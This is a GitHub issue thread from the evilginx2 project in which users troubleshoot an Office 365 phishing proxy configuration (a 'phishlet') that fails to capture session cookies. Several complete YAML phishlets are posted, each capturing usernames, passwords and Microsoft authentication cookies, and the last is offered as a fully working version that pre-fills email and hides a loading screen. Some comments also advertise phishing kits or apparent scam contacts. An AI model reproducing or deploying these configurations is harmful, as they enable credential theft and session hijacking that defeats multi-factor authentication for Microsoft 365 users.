### ISSUE TITLE
Is there a working o365 method that grabs cookies (I have tried all the suggestions).

### ISSUE THREAD

**Issue by squodgeface** [kgretzky/evilginx2#764]
Like many people, I am having issues with the o365 template. The o365 account loads and the username and password are grabbed. However, there are no cookies.
I have spent some time trying the various suggestions from this site.
For example:
```
auth_tokens:
 - domain: 'login.microsoftonline.com' 
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']

```
auth_tokens:
 - domain: '.login.microsoftonline.com'
   keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
```

```
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
  path: '/'
```

Is there any kind of working solution to this? I am happy to test suggestions and post the results.

**Comment by 456478** [comment]
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: **true**, is_landing: true}


auth_urls:
 - '/kmsi*'

**Comment by Web3villian666** [comment]
I got latest o365 phishlets off kgretzky..... Y'all can reach support on icq @mrgretzky

**Comment by ghoxt007** [comment]
Got working phishlets for o365 captures cookies, telegram me @ghoxt007

**Comment by 456478** [comment]
@squodgeface be careful with sending any ₿₿₿ to these guys

did you try #760?

**Comment by Onyinye10** [comment]
Seems like an issue with your authentication tokens but will have to see how your o365 phishlet is coded to tell

**Comment by 456478** [comment]
i just noticed this:
```
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
```

i feel like having 2 "_keys_" arrays isn't going to solve your problems. did you actually run this or made a mistake copy-pasting it to github? 

also why dont you just try capturing all of the cookies via regexp? it's what's in my phishlet at the moment
```
auth_tokens:
  - domain: ".microsoftonline.com"
    keys: [".*,regexp"]
```

**Comment by squodgeface** [comment]
@456478 - thank you for your suggestions. I have tried the `regexp` method but I still have the same problem: it captures the username and password but no cookies. I also set the auth_tokens to capture `esctx` which is one of the first cookies set by o365 (before the username and password are entered). Again, no cookies are captured.

I have pasted my `o365.yaml `below and made a few comments with `#` This is the original file modified as suggested. Should I add or delete something? Any ideas will be welcomed.
```

name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
  #    <insert-adfs-subdomain> = adfs
  #    <insert-adfs-host> = example.com
  #    <insert-adfs-subdomain-and-host> = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostnam>
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: >
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}',>
auth_tokens:
  - domain: '.microsoftonline.com' # I also tried .login.microsoftonline.com
    keys: ['.*,regexp'] # to get all cookies 
auth_urls:
  - '/kmsi' # to tell EG that the session is over once this URL is displayed (and therefore to record the cookies)
credentials:
  username:
    key: '(login|UserName)' # gets username fine
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)' # gets password fine
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
```

**Comment by 456478** [comment]
Auth URL: kmsi should end with an asterisk

/kmsi*

also are you sure you aren't using a live.com account to test? that would give cookies under a domain evilginx isn't listening for

**Comment by squodgeface** [comment]
@456478 Thank you. I have tried /kmsi* but that did not change anything.
I am not using a live.com account. I am using a paid for o365 account which uses my domain name.

The main problem is this: EG does not think that the session has ended and therefore does not record any cookies. The redirection never happens. 
I have tried with other sites and the cookies are recorded and then the redirection happens. I just cannot get this to work for o365.

I would really appreciate a copy of your phishlet. That would be great and very generous.

**Comment by nakedpages** [comment]
Checkout 

> Nakedpages-Builder new Phishing app which allows you to run a battle tested and experienced phishing app in nodesJS, using a few lines of autogenerated JS code, Configuration for each project are written in Plain Javascript thus making everything and anything possible also giving you access to low level access to request/response object without making changes to the binary the whole platform runs on.

https://github.com/nakedpages

**Comment by Web3villian666** [comment]
Support was able to make my o365 phishlets forward results to mail and it was all on the .yaml best you work with some experience https://icq.im/mrgretzky could help fix your phishlet issue

**Comment by Kevin3-00** [comment]
> Support was able to make my o365 phishlets forward results to mail and it was all on the .yaml best you work with some experience https://icq.im/mrgretzky could help fix your phishlet issue

Scammer noticed

**Comment by 456478** [comment]
Feel free to mark his messages. Anybody giving coins to that account deserves to lose them: "Talk to the author", spare me the laughter

**Comment by ghoxt007** [comment]
working O365 phishlets captures cookies telegram me @ghoxt007

**Comment by 456478** [comment]
I also have one which [removes](https://github.com/kgretzky/evilginx2/issues/750#issuecomment-1098553565) the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (plus support's non o365 emails)

```
name: "o365"
author: "@456478"
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

auth_tokens:
  - domain: ".microsoftonline.com"
    keys: [".*,regexp"]

force_post:
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"

auth_urls:
  - "/kmsi*"

credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
  password:
    key: '(passwd|Password)'
    search: '(.*)'

login:
  domain: "login.microsoftonline.com"
  path: "/"

```
![office_demo30_800](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)
